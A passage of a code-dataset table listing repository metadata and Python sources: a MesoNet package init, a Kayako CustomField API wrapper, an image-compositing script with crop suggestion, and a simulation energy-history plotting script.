hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
9ba00e9b29b3ca03c6563bbca721e5ab24550cd4 | 469 | py | Python | mesonet/__init__.py | bf777/MesoNet | 87cd631e72fc2af596f97aa2b73f8e57b0cc27e6 | [
"CC-BY-4.0"
] | 2 | 2021-08-02T21:04:52.000Z | 2021-11-10T07:00:40.000Z | mesonet/__init__.py | bf777/MesoNet | 87cd631e72fc2af596f97aa2b73f8e57b0cc27e6 | [
"CC-BY-4.0"
] | 2 | 2021-12-02T10:47:00.000Z | 2022-03-07T20:28:11.000Z | mesonet/__init__.py | bf777/MesoNet | 87cd631e72fc2af596f97aa2b73f8e57b0cc27e6 | [
"CC-BY-4.0"
] | null | null | null | """
MesoNet
Authors: Brandon Forys and Dongsheng Xiao, Murphy Lab
https://github.com/bf777/MesoNet
Licensed under the Creative Commons Attribution 4.0 International License (see LICENSE for details)
"""
# __init__.py
from mesonet.utils import *
from mesonet.dlc_predict import predict_dlc
from mesonet.predict_regions import predict_regions
from mesonet.train_model import train_model
from mesonet.gui_start import gui_start
from mesonet.img_augment import img_augment
| 33.5 | 99 | 0.835821 | """
MesoNet
Authors: Brandon Forys and Dongsheng Xiao, Murphy Lab
https://github.com/bf777/MesoNet
Licensed under the Creative Commons Attribution 4.0 International License (see LICENSE for details)
"""
# __init__.py
from mesonet.utils import *
from mesonet.dlc_predict import predict_dlc
from mesonet.predict_regions import predict_regions
from mesonet.train_model import train_model
from mesonet.gui_start import gui_start
from mesonet.img_augment import img_augment
| 0 | 0 | 0 |
a54e4fcb9e12dd8b283e1118efefe5930ce03899 | 3,362 | py | Python | src/kayako/objects/custom_field.py | iXsystems/kayako-python-api-library | 5c43ae331904eac1a66301e2f40d29a4e52fd49d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/kayako/objects/custom_field.py | iXsystems/kayako-python-api-library | 5c43ae331904eac1a66301e2f40d29a4e52fd49d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | src/kayako/objects/custom_field.py | iXsystems/kayako-python-api-library | 5c43ae331904eac1a66301e2f40d29a4e52fd49d | [
"BSD-2-Clause-FreeBSD"
] | null | null | null | # -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ravi Sharma
#
# Distributed under the terms of the Lesser GNU General Public License (LGPL)
#-----------------------------------------------------------------------------
'''
Created on Feb 26, 2014
@author: ravi
'''
from lxml import etree
from kayako.core.lib import UnsetParameter
from kayako.core.object import KayakoObject
from kayako.exception import KayakoRequestError, KayakoResponseError
class CustomField(KayakoObject):
'''
Kayako Custom Field API Object.
customfieldid The custom field ID.
customfieldgroupid The custom field group id.
title The title of the custom field.
fieldtype The type of the custom field.
fieldname The field name of custom field.
defaultvalue The default value of custom field.
isrequired 1 or 0 boolean that controls whether or not field required.
usereditable 1 or 0 boolean that controls whether or not to edit the field by user.
staffeditable 1 or 0 boolean that controls whether or not to edit the field by staff.
regexpvalidate A regex string for validate.
displayorder The display order of the custom field.
encryptindb 1 or 0 boolean that controls whether or not field is encrypted.
description The description of the custom field.
'''
controller = '/Base/CustomField'
__parameters__ = [
'id',
'customfieldid',
'customfieldgroupid',
'title',
'fieldtype',
'fieldname',
'defaultvalue',
'isrequired',
'usereditable',
'staffeditable',
'regexpvalidate',
'displayorder',
'encryptindb',
'description',
]
@classmethod
@classmethod
@classmethod
| 35.020833 | 126 | 0.680845 | # -*- coding: utf-8 -*-
#-----------------------------------------------------------------------------
# Copyright (c) 2014, Ravi Sharma
#
# Distributed under the terms of the Lesser GNU General Public License (LGPL)
#-----------------------------------------------------------------------------
'''
Created on Feb 26, 2014
@author: ravi
'''
from lxml import etree
from kayako.core.lib import UnsetParameter
from kayako.core.object import KayakoObject
from kayako.exception import KayakoRequestError, KayakoResponseError
class CustomField(KayakoObject):
    '''
    Kayako Custom Field API Object.
    customfieldid The custom field ID.
    customfieldgroupid The custom field group id.
    title The title of the custom field.
    fieldtype The type of the custom field.
    fieldname The field name of custom field.
    defaultvalue The default value of custom field.
    isrequired 1 or 0 boolean that controls whether or not field required.
    usereditable 1 or 0 boolean that controls whether or not to edit the field by user.
    staffeditable 1 or 0 boolean that controls whether or not to edit the field by staff.
    regexpvalidate A regex string for validate.
    displayorder The display order of the custom field.
    encryptindb 1 or 0 boolean that controls whether or not field is encrypted.
    description The description of the custom field.
    '''

    controller = '/Base/CustomField'

    __parameters__ = [
        'id',
        'customfieldid',
        'customfieldgroupid',
        'title',
        'fieldtype',
        'fieldname',
        'defaultvalue',
        'isrequired',
        'usereditable',
        'staffeditable',
        'regexpvalidate',
        'displayorder',
        'encryptindb',
        'description',
    ]

    @classmethod
    def _parse_custom_field(cls, custom_field_tree):
        '''Build the CustomField keyword arguments from one XML element.'''
        customfieldid = custom_field_tree.get('customfieldid')
        params = dict(
            id=customfieldid,
            # BUG FIX: this was previously `customfieldid=id`, which stored
            # the *builtin id() function* -- the `id=` kwarg above does not
            # create a local name -- instead of the attribute value.
            customfieldid=customfieldid,
            customfieldgroupid=cls._parse_int(custom_field_tree.get('customfieldgroupid')),
            title=custom_field_tree.get('title'),
            fieldtype=cls._parse_int(custom_field_tree.get('fieldtype')),
            fieldname=custom_field_tree.get('fieldname'),
            defaultvalue=custom_field_tree.get('defaultvalue'),
            isrequired=cls._parse_int(custom_field_tree.get('isrequired')),
            usereditable=cls._parse_int(custom_field_tree.get('usereditable')),
            staffeditable=cls._parse_int(custom_field_tree.get('staffeditable')),
            regexpvalidate=custom_field_tree.get('regexpvalidate'),
            displayorder=cls._parse_int(custom_field_tree.get('displayorder')),
            encryptindb=cls._parse_int(custom_field_tree.get('encryptindb')),
            description=custom_field_tree.get('description'),
        )
        return params

    @classmethod
    def get_all(cls, api):
        '''Return every custom field known to the API as CustomField objects.'''
        response = api._request('%s' % (cls.controller), 'GET')
        tree = etree.parse(response)
        return [CustomField(api, **cls._parse_custom_field(custom_field_tree)) for custom_field_tree in tree.findall('customfield')]

    @classmethod
    def get(cls, api, customfieldid):
        '''Return the first list option of the given custom field, or None.'''
        response = api._request('%s/ListOptions/%s/' % (cls.controller, customfieldid), 'GET')
        tree = etree.parse(response)
        node = tree.find('option')
        if node is None:
            return None
        params = cls._parse_custom_field(node)
        return CustomField(api, **params)

    def __str__(self):
        return '<CustomField (%s): %s>' % (self.id, self.fieldname)
| 1,435 | 0 | 93 |
d6b30d1e7120d3e587e3c5909ed90c9d5af02c07 | 10,584 | py | Python | server/api/composer.py | notantony/Grid-Anchor-based-Image-Cropping-Pytorch | 32a2dea9151c123c8e589bd196450f56cf3ef7d1 | [
"MIT"
] | null | null | null | server/api/composer.py | notantony/Grid-Anchor-based-Image-Cropping-Pytorch | 32a2dea9151c123c8e589bd196450f56cf3ef7d1 | [
"MIT"
] | null | null | null | server/api/composer.py | notantony/Grid-Anchor-based-Image-Cropping-Pytorch | 32a2dea9151c123c8e589bd196450f56cf3ef7d1 | [
"MIT"
] | null | null | null | # # -*- coding: utf-8 -*-
import math
import random
import numpy as np
import heapq
from io import BytesIO
from PIL import Image, ImageOps
from server.api.crop_suggestor import CropSuggestorModel
from server.api.utils import compress_bg, read_image, nd_deserialize, np_isground, tiling_range, n_dim_iter, \
np_bg_goodness, np_iswater
from server.api.graphics import paste_obj
import json
import base64
cat_data = read_image('./input/obj/cat.png')
cat_obj = ObjImg(cat_data, "cat", "object;grounded", size_ratio=0.4, well_cropped=False)
dog_data = read_image('./input/obj/dog.png')
dog_obj = ObjImg(dog_data, "dog", "object;grounded", size_ratio=0.75, well_cropped=True)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
rhino_data = read_image('./input/obj/rhino.png')
rhino_obj = ObjImg(rhino_data, "rhino", "object;grounded", size_ratio=1.5)
zebra_data = read_image('./input/obj/zebra.png')
zebra_obj = ObjImg(zebra_data, "zebra", "object;grounded", size_ratio=1.5, well_cropped=True)
lion_data = read_image('./input/obj/lion.png')
lion_obj = ObjImg(lion_data, "zebra", "object;grounded", size_ratio=1.5)
giraffe_data = read_image('./input/obj/giraffe.png')
giraffe_obj = ObjImg(giraffe_data, "giraffe", "object;grounded", size_ratio=3.0)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
pirate_data = read_image('./input/obj/pirate.png')
pirate_obj = ObjImg(pirate_data, "pirate", "object;grounded", size_ratio=1.8)
boat_data = read_image('./input/obj/boat.png')
boat_obj = ObjImg(boat_data, "boat", "object;water", size_ratio=1.0, well_cropped=True)
parrot_data = read_image('./input/obj/parrot.png')
parrot_obj = ObjImg(parrot_data, "parrot", "object;air", size_ratio=1.0, well_cropped=True)
field_cm = loadnp('./input/bg/field_cm.json', 'colormap')
field_dm = loadnp('./input/bg/field_dm.json', 'depthmap')
field_bg = Image.open("./input/bg/field.jpg")
africa_cm = loadnp('./input/bg/africa_cm.json', 'colormap')
africa_dm = loadnp('./input/bg/africa_dm.json', 'depthmap')
africa_bg = Image.open("./input/bg/africa.jpg")
beach_cm = loadnp('./input/bg/beach_cm.json', 'colormap')
beach_dm = loadnp('./input/bg/beach_dm.json', 'depthmap')
beach_bg = Image.open("./input/bg/beach.jpg")
autumn_cm = loadnp('./input/bg/autumn_cm.json', 'colormap')
autumn_dm = loadnp('./input/bg/autumn_dm.json', 'depthmap')
autumn_bg = Image.open("./input/bg/autumn.jpg")
composer = ImageComposer()
# composer.compose(field_bg, [person_obj], field_cm, field_dm)
# composer.compose(field_bg, [cat_obj, person_obj], field_cm, field_dm)
import cv2
# composer.compose(africa_bg, [rhino_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [zebra_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj, giraffe_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj], africa_cm, africa_dm)
composer.compose(field_bg, [cat_obj, dog_obj], field_cm, field_dm)
# composer.compose(beach_bg, [parrot_obj, pirate_obj], beach_cm, beach_dm)
# composer.compose(autumn_bg, [person_obj], autumn_cm, autumn_dm) | 39.492537 | 123 | 0.614512 | # # -*- coding: utf-8 -*-
import math
import random
import numpy as np
import heapq
from io import BytesIO
from PIL import Image, ImageOps
from server.api.crop_suggestor import CropSuggestorModel
from server.api.utils import compress_bg, read_image, nd_deserialize, np_isground, tiling_range, n_dim_iter, \
np_bg_goodness, np_iswater
from server.api.graphics import paste_obj
class ObjImg():
    """A foreground object image plus placement metadata for compositing.

    Wraps a decoded RGBA image (auto-cropped to its alpha bounding box and
    re-padded) together with ';'-separated semantic tags ('grounded', 'air',
    'bg_obj', ...) and a relative size used when the object is scaled into
    a background.
    """
    def __init__(self, image_data, obj_class=None, obj_tags=None, size_ratio=1.0, pad=5, well_cropped=False):
        # NOTE(review): obj_class is accepted but never stored or used here.
        image = Image.open(BytesIO(image_data)).convert('RGBA')
        # Crop to the non-transparent region, then re-pad with a small border.
        bbox = image.getbbox()
        image = image.crop(bbox)
        if pad != 0:
            image = ImageOps.expand(image, pad)
        self.image = image
        self.size_ratio = float(size_ratio)
        # obj_tags must be a ';'-separated string (None would raise here).
        self.tags = set(obj_tags.split(";"))
        self.well_cropped = well_cropped
        # Both filled in later by normalize(): target pixel size and the
        # object's footprint measured in background tiles.
        self.expected_size = None
        self.tiles_size = None
    def is_grounded(self):
        # True if the object must stand on ground tiles.
        return 'grounded' in self.tags
    def is_air(self):
        # True if the object must be placed over non-ground (air) tiles.
        return 'air' in self.tags
    def is_bg_obj(self):
        # True if the object is background decoration (allowed to overlap).
        return 'bg_obj' in self.tags
    def get_xy_ratio(self):
        # Width / height aspect ratio of the stored image.
        return float(self.image.size[0]) / self.image.size[1]
    def normalize(self, tile_size, standart_size):
        # Compute expected_size (target pixel size) and tiles_size (how many
        # background tiles of `tile_size` pixels the object spans).
        # `standart_size` is a reference height in pixels; None means
        # "scale the raw image dimensions by size_ratio only".
        if standart_size is None:
            self.expected_size = (int(self.size_ratio * self.image.size[0]), int(self.size_ratio * self.image.size[1]))
        else:
            self.expected_size = (int(self.size_ratio * standart_size * self.get_xy_ratio()), \
                int(self.size_ratio * standart_size))
        self.tiles_size = (int(math.ceil(float(self.expected_size[0]) / tile_size[0])), \
            int(math.ceil(float(self.expected_size[1]) / tile_size[1])))
class ImageComposer():
    """Places foreground ObjImg instances onto a background image.

    The background is divided into a coarse tile grid (side controlled by
    `complexity`). Candidate tile positions are enumerated per object,
    filtered by ground/air and overlap constraints, and every surviving
    composition is rendered to ./output/ and handed to suggest() for
    crop scoring.
    """
    def __init__(self, complexity=6):
        # Number of tiles along the longer image axis.
        self.complexity = complexity
    def compose(self, bg_image, objs, bg_cm, bg_dm, search='complete', standart_size=None, tries=None, allow_not_all=True):
        # bg_cm / bg_dm: per-pixel color-class map and depth map of the
        # background. NOTE(review): `allow_not_all` is accepted but unused.
        if search not in ['complete', 'random']:
            raise ValueError("Unexpected `search` parameter value: {}".format(search))
        # if search == 'complete' and tries is not None:
        #     raise ValueError("Parameter `tries` cannot be used with parameter `search` == 'complete'")
        if not isinstance(standart_size, (int, float)) and standart_size not in [None, 'depth', 'compostition']:
            raise ValueError("Unexpected `standart_size` parameter value: {}".format(search))
        # Tile grid: `complexity` tiles along the longer axis, scaled on the
        # shorter axis to keep tiles roughly square.
        if bg_image.size[0] > bg_image.size[1]:
            steps_x = self.complexity
            steps_y = int(float(steps_x) * bg_image.size[1] / bg_image.size[0])
        else:
            steps_y = self.complexity
            steps_x = int(float(steps_y) * bg_image.size[0] / bg_image.size[1])
        steps = (steps_x, steps_y)
        # [x][y]-like PIL upper-left corner format
        bg_cm = np.flip(np.rot90(bg_cm, k=-1), axis=1)
        bg_dm = np.flip(np.rot90(bg_dm, k=-1), axis=1)
        cm_tiles = compress_bg(bg_cm, steps)
        dm_tiles = compress_bg(bg_dm, steps)
        if len(objs) == 0: # TODO
            return []
        # Pixel extent of one tile along each axis.
        step_pxs = (float(bg_image.size[0]) / steps[0], float(bg_image.size[1]) / steps[1])
        isground_tiles = np_isground(cm_tiles)
        bg_goodness_tiles = np_bg_goodness(cm_tiles)
        # Mean depth over ground tiles; used below to scale objects with
        # distance from the camera.
        dists_mean = dm_tiles[isground_tiles != 0].mean()
        dist_std = 0.25 * bg_image.size[1] #* max(objs, key=lambda x: x.size_ratio).size_ratio
        for obj in objs:
            obj.normalize(step_pxs, dist_std)
        # Per-object candidate (x, y) tile positions.
        compositions = []
        for obj in objs:
            x_range = list(tiling_range(0, steps_x, obj.tiles_size[0], 1))
            y_range = list(tiling_range(0, steps_y, obj.tiles_size[1], 1))
            compositions.append(n_dim_iter([x_range, y_range]))
        # Enumerate the cartesian product of all objects' positions and keep
        # the compositions satisfying the placement constraints.
        good = []
        for coord_list in n_dim_iter(compositions):
            fail = False
            bg_cur = bg_goodness_tiles.copy()
            for obj, (x_pos, y_pos) in zip(objs, coord_list):
                # Tile under the horizontal middle of the object's bottom edge.
                bottom_xy = (int(x_pos + math.ceil(float(obj.tiles_size[0]) / 2) - 1), y_pos + int(obj.tiles_size[1]) - 1)
                if obj.is_grounded() and not isground_tiles[bottom_xy]:
                    fail = True
                    break
                if obj.is_air() and isground_tiles[bottom_xy]:
                    fail = True
                    break
                if not obj.is_bg_obj():
                    # Mark the tiles this foreground object occupies.
                    bg_cur[x_pos:x_pos + obj.tiles_size[0], y_pos:y_pos + obj.tiles_size[1]] -= 1
            # Tiles driven below -1 indicate objects stacking on the same
            # tile (or on low-goodness tiles) -- reject the composition.
            if np.min(bg_cur) < -1:
                fail = True
            if not fail:
                # Pixel bounding box around all occupied (-1) tiles; None if
                # nothing was marked.
                core_bbox = None
                if bg_cur[bg_cur == -1].any():
                    core_bbox = [float("inf"), float("inf"), float("-inf"), float("-inf")]
                    for i in range(steps_x):
                        for j in range(steps_y):
                            if bg_cur[i][j] == -1:
                                core_bbox[0] = min(core_bbox[0], int(i * step_pxs[0]))
                                core_bbox[1] = min(core_bbox[1], int(j * step_pxs[1]))
                                core_bbox[2] = max(core_bbox[2], int((i + 1) * step_pxs[0]))
                                core_bbox[3] = max(core_bbox[3], int((j + 1) * step_pxs[1]))
                good.append((coord_list, core_bbox))
        if tries is not None:
            random.shuffle(good)
            good = good[:tries]
        # Render each surviving composition to disk and collect its bbox.
        path_bboxes = []
        for i, (coord_list, core_bbox) in enumerate(good):
            bg_cur = bg_image
            for obj, (x_pos, y_pos) in zip(objs, coord_list):
                bottom_xy = (int(x_pos + math.ceil(obj.tiles_size[0] / 2) - 1), y_pos + int(obj.tiles_size[1]) - 1)
                if obj.is_air():
                    dist_coef = 1
                else:
                    # Scale by relative depth at the object's foot tile.
                    dist_coef = dists_mean / dm_tiles[bottom_xy]
                new_size = (int(obj.expected_size[0] * dist_coef), int(obj.expected_size[1] * dist_coef))
                x_coord = int(step_pxs[0] * (x_pos + float(obj.tiles_size[0]) / 2))
                y_coord = int(step_pxs[1] * (y_pos + obj.tiles_size[1])) - 10
                try:
                    # (not obj.well_cropped)
                    bg_cur = paste_obj(bg_cur, obj.image, new_size, lower_middle=(x_coord, y_coord), smooth=True)
                except ValueError:
                    pass
            path = "./output/tmp{}.png".format(i)
            # bg_cur.save(path)
            cv2.imwrite(path, bg_cur)
            path_bboxes.append((path, core_bbox))
        suggest(path_bboxes)
import json
import base64
def loadnp(filepath, name='data'):
    """Read *filepath* as JSON and deserialize the array stored under *name*."""
    with open(filepath, 'r') as handle:
        decoded = json.load(handle)
    return nd_deserialize(decoded, name)
cat_data = read_image('./input/obj/cat.png')
cat_obj = ObjImg(cat_data, "cat", "object;grounded", size_ratio=0.4, well_cropped=False)
dog_data = read_image('./input/obj/dog.png')
dog_obj = ObjImg(dog_data, "dog", "object;grounded", size_ratio=0.75, well_cropped=True)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
rhino_data = read_image('./input/obj/rhino.png')
rhino_obj = ObjImg(rhino_data, "rhino", "object;grounded", size_ratio=1.5)
zebra_data = read_image('./input/obj/zebra.png')
zebra_obj = ObjImg(zebra_data, "zebra", "object;grounded", size_ratio=1.5, well_cropped=True)
lion_data = read_image('./input/obj/lion.png')
lion_obj = ObjImg(lion_data, "zebra", "object;grounded", size_ratio=1.5)
giraffe_data = read_image('./input/obj/giraffe.png')
giraffe_obj = ObjImg(giraffe_data, "giraffe", "object;grounded", size_ratio=3.0)
person_data = read_image('./input/obj/man.png')
person_obj = ObjImg(person_data, "person", "object;grounded", size_ratio=1.8)
pirate_data = read_image('./input/obj/pirate.png')
pirate_obj = ObjImg(pirate_data, "pirate", "object;grounded", size_ratio=1.8)
boat_data = read_image('./input/obj/boat.png')
boat_obj = ObjImg(boat_data, "boat", "object;water", size_ratio=1.0, well_cropped=True)
parrot_data = read_image('./input/obj/parrot.png')
parrot_obj = ObjImg(parrot_data, "parrot", "object;air", size_ratio=1.0, well_cropped=True)
field_cm = loadnp('./input/bg/field_cm.json', 'colormap')
field_dm = loadnp('./input/bg/field_dm.json', 'depthmap')
field_bg = Image.open("./input/bg/field.jpg")
africa_cm = loadnp('./input/bg/africa_cm.json', 'colormap')
africa_dm = loadnp('./input/bg/africa_dm.json', 'depthmap')
africa_bg = Image.open("./input/bg/africa.jpg")
beach_cm = loadnp('./input/bg/beach_cm.json', 'colormap')
beach_dm = loadnp('./input/bg/beach_dm.json', 'depthmap')
beach_bg = Image.open("./input/bg/beach.jpg")
autumn_cm = loadnp('./input/bg/autumn_cm.json', 'colormap')
autumn_dm = loadnp('./input/bg/autumn_dm.json', 'depthmap')
autumn_bg = Image.open("./input/bg/autumn.jpg")
composer = ImageComposer()
# composer.compose(field_bg, [person_obj], field_cm, field_dm)
# composer.compose(field_bg, [cat_obj, person_obj], field_cm, field_dm)
import cv2
def suggest(path_bboxes, amount=10):
    """Score crop suggestions for each rendered composition and save the best.

    path_bboxes: list of (image path, core bbox) pairs, where the bbox (or
    None) marks the region the crop must contain. Keeps the `amount`
    highest-scoring crops via a min-heap, writes them to ./crops/ and
    prints "rank score source-path" lines.
    """
    suggestor = CropSuggestorModel()
    # Min-heap of (score, source path, cropped BGR image).
    best_results = []
    for path, core_bbox in path_bboxes:
        image = cv2.imread(path)
        # image = cv2.imread('/home/notantony/tmp/Grid-Anchor-based-Image-Cropping-Pytorch/output/tmp{}.png'.format(i))
        # Channel swap BGR -> RGB for the suggestor model.
        image = image[:, :, (2, 1, 0)]
        q = suggestor.suggest(image, core_bbox=core_bbox, n_results=1)
        # print(q)
        for score, box in q:
            cropped = image[int(box[1]):int(box[3]), int(box[0]):int(box[2])]
            # heappushpop keeps the heap at `amount` entries, evicting the
            # current minimum score; crops are stored swapped back to BGR.
            if len(best_results) < amount:
                heapq.heappush(best_results, (float(score), path, cropped[:, :, (2, 1, 0)]))
            else:
                heapq.heappushpop(best_results, (float(score), path, cropped[:, :, (2, 1, 0)]))
    for i, (score, orig_path, img) in enumerate(sorted(best_results, key=lambda x: x[0], reverse=True)):
        cv2.imwrite('./crops/{}.jpg'.format(i), img)
        print("{} {} {}".format(i, score, orig_path))
# composer.compose(africa_bg, [rhino_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [zebra_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj, giraffe_obj], africa_cm, africa_dm)
# composer.compose(africa_bg, [lion_obj], africa_cm, africa_dm)
composer.compose(field_bg, [cat_obj, dog_obj], field_cm, field_dm)
# composer.compose(beach_bg, [parrot_obj, pirate_obj], beach_cm, beach_dm)
# composer.compose(autumn_bg, [person_obj], autumn_cm, autumn_dm) | 7,083 | -5 | 306 |
9e2027a2a9cfcdbe7245e5fcb4e81bbb8703a867 | 3,726 | py | Python | sims/s130/plot-double-shear-cmp.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 1 | 2019-12-19T16:21:13.000Z | 2019-12-19T16:21:13.000Z | sims/s130/plot-double-shear-cmp.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | null | null | null | sims/s130/plot-double-shear-cmp.py | ammarhakim/ammar-simjournal | 85b64ddc9556f01a4fab37977864a7d878eac637 | [
"MIT",
"Unlicense"
] | 2 | 2020-01-08T06:23:33.000Z | 2020-01-08T07:06:50.000Z | import pylab
import tables
import math
import numpy
fig = pylab.figure(2)
tr_125 = pylab.loadtxt('../s125/s125-double-shear_totalEnergy')
tr_129 = pylab.loadtxt('../s129/s129-double-shear_totalEnergy')
tr_130 = pylab.loadtxt('../s130/s130-double-shear_totalEnergy')
refTe = tr_125[0,1]
pylab.plot(tr_125[:,0], tr_125[:,1], label='CFL 0.2')
pylab.plot(tr_129[:,0], tr_129[:,1], label='CFL 0.1')
pylab.plot(tr_130[:,0], tr_130[:,1], label='CFL 0.05')
pylab.legend(loc='lower left')
pylab.title('Total Energy History')
pylab.xlabel('Time [s]')
pylab.ylabel('Total Energy')
pylab.savefig('s125s129s130-double-shear-totalEnergy_cmp.png')
pylab.close()
print "CFL 0.2", tr_125[-1,1]-tr_125[0,1]
print "CFL 0.1", tr_129[-1,1]-tr_129[0,1]
print "CFL 0.05", tr_130[-1,1]-tr_130[0,1]
| 26.055944 | 107 | 0.506978 | import pylab
import tables
import math
import numpy
def projectOnFinerGrid(Xc, Yc, q):
    """Interpolate 4-node DG cell data onto a 2x refined mesh (loop version).

    Xc, Yc: 1D arrays of cell-center coordinates (assumed uniform spacing).
    q: array of shape (nx, ny, 4) holding the four corner coefficients of
       each cell (nodes ordered counter-clockwise from lower-left).

    Returns (Xn, Yn, qn): refined node coordinates (two nodes per cell, at
    center +/- h/4) and interpolated values on the (2*nx, 2*ny) grid.
    """
    dx = Xc[1]-Xc[0]
    dy = Yc[1]-Yc[0]
    nx = Xc.shape[0]
    ny = Yc.shape[0]
    # refined mesh coordinates
    Xn = numpy.zeros((2*nx,), float)
    Xn[0:nx] = Xc-0.25*dx
    Xn[nx:] = Xc+0.25*dx
    Xn.sort()
    Yn = numpy.zeros((2*ny,), float)
    # BUG FIX: the y coordinates previously used the x-axis count/spacing
    # (Yn[0:nx] = Yc-0.25*dx), which broke whenever nx != ny or dx != dy.
    Yn[0:ny] = Yc-0.25*dy
    Yn[ny:] = Yc+0.25*dy
    Yn.sort()
    qn = numpy.zeros((2*nx, 2*ny), float)
    # node 0 (lower-left of each 2x2 refined patch)
    for i in range(nx):
        for j in range(ny):
            qn[2*i,2*j] = 1/16.0*(9*q[i,j,0]+3*q[i,j,1]+3*q[i,j,3]+q[i,j,2])
    # node 1 (lower-right)
    for i in range(nx):
        for j in range(ny):
            qn[2*i+1,2*j] = 1/16.0*(9*q[i,j,1]+3*q[i,j,2]+3*q[i,j,0]+q[i,j,3])
    # node 2 (upper-right)
    for i in range(nx):
        for j in range(ny):
            qn[2*i+1,2*j+1] = 1/16.0*(9*q[i,j,2]+3*q[i,j,1]+3*q[i,j,3]+q[i,j,0])
    # node 3 (upper-left)
    for i in range(nx):
        for j in range(ny):
            qn[2*i,2*j+1] = 1/16.0*(9*q[i,j,3]+3*q[i,j,2]+3*q[i,j,0]+q[i,j,1])
    return Xn, Yn, qn
def projectOnFinerGrid_f(Xc, Yc, q):
    """Vectorized version of projectOnFinerGrid (same contract, no loops).

    Returns (Xn, Yn, qn) with qn of shape (2*nx, 2*ny).
    """
    dx = Xc[1]-Xc[0]
    dy = Yc[1]-Yc[0]
    nx = Xc.shape[0]
    ny = Yc.shape[0]
    # refined mesh coordinates
    Xn = numpy.zeros((2*nx,), float)
    Xn[0:nx] = Xc-0.25*dx
    Xn[nx:] = Xc+0.25*dx
    Xn.sort()
    Yn = numpy.zeros((2*ny,), float)
    # BUG FIX: previously used nx/dx for the y axis, breaking nx != ny grids.
    Yn[0:ny] = Yc-0.25*dy
    Yn[ny:] = Yc+0.25*dy
    Yn.sort()
    qn = numpy.zeros((2*nx, 2*ny), float)
    # node 0 (lower-left)
    qn[0:2*nx:2, 0:2*ny:2] = 1/16.0*(9*q[:,:,0]+3*q[:,:,1]+3*q[:,:,3]+q[:,:,2])
    # node 1 (lower-right)
    qn[1:2*nx:2, 0:2*ny:2] = 1/16.0*(9*q[:,:,1]+3*q[:,:,2]+3*q[:,:,0]+q[:,:,3])
    # node 2 (upper-right)
    qn[1:2*nx:2, 1:2*ny:2] = 1/16.0*(9*q[:,:,2]+3*q[:,:,1]+3*q[:,:,3]+q[:,:,0])
    # node 3 (upper-left)
    qn[0:2*nx:2, 1:2*ny:2] = 1/16.0*(9*q[:,:,3]+3*q[:,:,2]+3*q[:,:,0]+q[:,:,1])
    return Xn, Yn, qn
def projectOnFinerGrid_f3(Xc, Yc, q):
    """Project 8-coefficient (second-order serendipity) DG data onto a 2x mesh.

    q has shape (nx, ny, 8); otherwise the contract matches
    projectOnFinerGrid. Returns (Xn, Yn, qn).
    """
    dx = Xc[1]-Xc[0]
    dy = Yc[1]-Yc[0]
    nx = Xc.shape[0]
    ny = Yc.shape[0]
    # refined mesh coordinates
    Xn = numpy.zeros((2*nx,), float)
    Xn[0:nx] = Xc-0.25*dx
    Xn[nx:] = Xc+0.25*dx
    Xn.sort()
    Yn = numpy.zeros((2*ny,), float)
    # BUG FIX: previously used nx/dx for the y axis, breaking nx != ny grids.
    Yn[0:ny] = Yc-0.25*dy
    Yn[ny:] = Yc+0.25*dy
    Yn.sort()
    qn = numpy.zeros((2*nx, 2*ny), float)
    c0 = q[:,:,0]
    c1 = q[:,:,1]
    c2 = q[:,:,2]
    c3 = q[:,:,3]
    c4 = q[:,:,4]
    c5 = q[:,:,5]
    c6 = q[:,:,6]
    c7 = q[:,:,7]
    # node 0 (lower-left)
    qn[0:2*nx:2, 0:2*ny:2] = (9*c7)/16.0+(3*c6)/16.0+(3*c5)/16.0+(9*c4)/16.0-(3*c3)/16.0-c2/8.0-(3*c1)/16.0
    # node 1 (lower-right)
    qn[1:2*nx:2, 0:2*ny:2] = (3*c7)/16.0+(3*c6)/16.0+(9*c5)/16.0+(9*c4)/16.0-c3/8.0-(3*c2)/16.0-(3*c0)/16.0
    # node 2 (upper-right)
